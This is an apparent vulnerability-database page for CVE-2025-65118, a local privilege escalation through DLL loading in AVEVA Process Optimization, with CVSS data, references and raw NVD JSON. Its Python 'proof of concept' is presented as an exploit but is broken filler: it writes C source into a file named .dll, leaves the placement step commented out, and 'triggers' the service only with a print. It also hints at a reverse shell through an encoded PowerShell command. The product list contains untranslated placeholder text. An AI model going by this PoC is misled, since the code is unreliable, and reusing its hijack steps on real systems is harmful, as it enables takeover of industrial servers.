CVE-2025-65118

Description

The vulnerability, if exploited, could allow an authenticated miscreant (OS Standard User) to trick Process Optimization services into loading arbitrary code and escalate privileges to OS System, potentially resulting in complete compromise of the Model Application Server.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:aveva:process_optimization:*:*:*:*:*:*:*:* - VULNERABLE

AVEVA Process Optimization < 修复版本

AVEVA Model Application Server 受影响版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-65118 PoC - Local Privilege Escalation in AVEVA Process Optimization
# This PoC demonstrates the privilege escalation attack vector

import os
import sys
import ctypes
import subprocess
from ctypes import wintypes

def create_malicious_dll():
    """Generate malicious DLL that will execute with System privileges"""
    dll_template = '''
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {{
    if (fdwReason == DLL_PROCESS_ATTACH) {{
        // Execute payload with System privileges
        // In real attack, this would be malicious code
        system("cmd.exe /c whoami > C:\\\\temp\\\\priv_esc_result.txt");
        
        // Create reverse shell or execute arbitrary commands
        // system("powershell -enc <encoded_command>");
    }}
    return TRUE;
}}
'''
    
    with open('malicious.dll', 'w') as f:
        f.write(dll_template)
    print('[+] Malicious DLL created')

def check_current_privileges():
    """Check current user privileges"""
    result = subprocess.run(['whoami'], capture_output=True, text=True)
    current_user = result.stdout.strip()
    print(f'[*] Current user: {current_user}')
    
    # Check if low-privilege user
    if 'Administrator' in current_user or 'SYSTEM' in current_user:
        print('[!] Already running as high-privilege user')
        return False
    return True

def exploit_privilege_escalation():
    """Attempt to exploit CVE-2025-65118"""
    print('[*] Starting CVE-2025-65118 exploitation...')
    
    if not check_current_privileges():
        print('[-] Exploitation not needed - already privileged')
        return False
    
    # Step 1: Create malicious DLL
    create_malicious_dll()
    
    # Step 2: Place DLL in service load path
    service_path = 'C:\\\\Program Files\\\\AVEVA\\\\Process Optimization\\\\'
    dll_target = os.path.join(service_path, 'malicious.dll')
    
    try:
        # In real attack, this would use path traversal or DLL hijacking
        # os.rename('malicious.dll', dll_target)
        print(f'[*] Attempting to place DLL at: {dll_target}')
        print('[*] Note: This requires specific conditions (path traversal, misconfiguration)')
    except Exception as e:
        print(f'[-] Failed to place DLL: {e}')
    
    # Step 3: Trigger service to load the DLL
    print('[*] Triggering Process Optimization service to load malicious DLL')
    # In real attack: service restart or specific trigger
    
    print('[*] If successful, check C:\\temp\\priv_esc_result.txt')
    return True

if __name__ == '__main__':
    print('CVE-2025-65118 AVEVA Process Optimization LPE PoC')
    print('=' * 60)
    exploit_privilege_escalation()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65118
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65118
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65118/
[4] VulDB https://vuldb.com/cve/CVE-2025-65118
[5] https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json
[6] https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea
[7] https://www.aveva.com/en/support-and-success/cyber-security-updates/
[8] https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65118", "sourceIdentifier": "[email protected]", "published": "2026-01-16T02:16:46.003", "lastModified": "2026-01-22T15:13:00.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability, if exploited, could allow an authenticated miscreant \n(OS Standard User) to trick Process Optimization services into loading \narbitrary code and escalate privileges to OS System, potentially \nresulting in complete compromise of the Model Application Server."}, {"lang": "es", "value": "La vulnerabilidad, si se explota, podría permitir a un malhechor autenticado (Usuario Estándar del SO) engañar a los servicios de Optimización de Procesos para que carguen código arbitrario y escalar privilegios a Sistema del SO, lo que podría resultar en un compromiso completo del servidor de aplicaciones del modelo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aveva:process_optimization:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025", "matchCriteriaId": "6048CC3D-EA33-484F-9223-10632815D595"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.aveva.com/en/support-and-success/cyber-security-updates/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}